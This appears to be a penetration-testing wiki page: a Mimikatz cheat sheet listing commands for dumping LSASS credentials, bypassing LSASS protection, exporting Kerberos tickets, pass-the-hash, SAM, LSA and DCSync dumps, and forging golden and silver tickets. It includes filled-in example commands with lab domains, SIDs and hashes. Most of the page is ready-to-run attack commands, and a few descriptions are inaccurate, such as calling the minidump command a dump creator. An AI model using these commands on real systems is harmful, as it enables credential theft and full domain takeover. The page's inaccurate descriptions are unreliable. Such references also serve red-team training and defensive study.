Mimikatz

Overview

A little tool to play with Windows security.

Mimikatz cheat sheet

Executing Mimikatz

Binary execution inline

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

PowerShell in memory

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

sekurlsa

Sekurlsa is a Mimikatz module that can be used to perform various memory-related attacks and extract sensitive information from the LSASS process.

Extracting cleartext and hashed credentials from LSASS

This command extracts plaintext passwords from memory for all logged-in users on the system.

privilege::debug
sekurlsa::logonPasswords

LSASS running with RunAsPPL

Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa

To bypass this we'll have to load the mimidriver.sys from the Mimikatz repo. This driver need to be in the same folder from where mimikatz is run.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

Extracting Kerberos tickets from memory

This command extracts Kerberos tickets from memory and saves them to a file.

sekurlsa::tickets /export

These tickets can then be used for pass-the-ticket attacks or offline password cracking.

Perform pass the hash

This command generates a new access token for the specified user using a specified NTLM hash. This can be used to bypass authentication on systems where NTLM authentication is used.

sekurlsa::pth /user:<username> /ntlm:<hash>
sekurlsa::pth /domain:<domain_name> /user:<username> /ntlm:<hash>

Loading memory dump file

This command creates a memory dump of the LSASS process and saves it to the specified file. This dump can then be analyzed offline for password cracking or other attacks.

sekurlsa::minidump <file_path>

lsadump

The lsadump module in Mimikatz allows for the extraction of sensitive information from the Local Security Authority (LSA) subsystem of the Windows operating system.

SAM dump

This command dumps the SAM (Security Account Manager) database, which contains information about local user accounts and their password hashes.

lsadump::sam

LSA dump

/inject – Inject LSASS to extract credentials
/name – account name for target user account
/id – RID for target user account
/patch – patch LSASS.

This command patches the LSA subsystem to allow for the addition of new users or the modification of existing users without authentication.

lsadump::lsa /patch

This command injects a DLL into the specified service and captures its credentials, which can include plaintext passwords and hashes.

lsadump::lsa /inject /name:<service_name>

LSA cache dump

This command dumps cached domain credentials from the LSA subsystem. These credentials can be used to authenticate to other systems on the network.

lsadump::cache

LSA dump secrets

This command dumps various secrets stored in the LSA subsystem, including cached domain credentials, LSA secrets, and NTLM hashes.

lsadump::secrets

DCSync

This command retrieves the password hash for a specified user account on a specified domain, allowing an attacker to potentially impersonate the user.

lsadump::dcsync /user:<username> /domain:<domain_name>

kerberos

Golden ticket

A Golden Ticket attack is a technique used by attackers to gain persistent access to a Windows domain. It involves the use of a forged Kerberos ticket, which allows an attacker to impersonate any user account in the domain and gain unrestricted access to any resource in the domain.

Obtaining the krbtgt hash

This command injects a DLL into the specified service and captures the credentials of the service account, including the service account's NTLM hash.

lsadump::lsa /inject /name:krbtgt

Creating the Golden ticket

This command creates a Golden Ticket for the specified user account, using the captured service account's NTLM hash and the domain's krbtgt hash.

kerberos::golden /user:[impersonating user] /domain:[domain] /sid:[domain sid] /krbtgt:[krbtgt hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt

Example:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:msp.local /sid:S-1-5-21-2998733414-582960673-4099777928 /krbtgt:aae39b0f0f043e3a7eefc88a13560c80 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Silver ticket

A Silver Ticket attack is another technique used by attackers to gain access to resources in a Windows domain. It involves the creation of a forged Kerberos ticket for a specific service, allowing an attacker to impersonate the service account and gain access to the resources associated with that service.

Creating the Silver ticket

kerberos::golden /domain:[domain] /sid:[domain sid] /target:[target computer] /service:[service] /rc4:[service account hash/machine account hash] /user:[impersonating user] /ptt

Example:

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'

vault

Mimikatz includes a module for extracting credentials from the Windows Credential Manager, also known as the "vault". This module is called "vault".

vault::cred /patch

References

PreviousDumping the contents of ntds.dit files using PowerShell NextLAPS

Last updated 1 year ago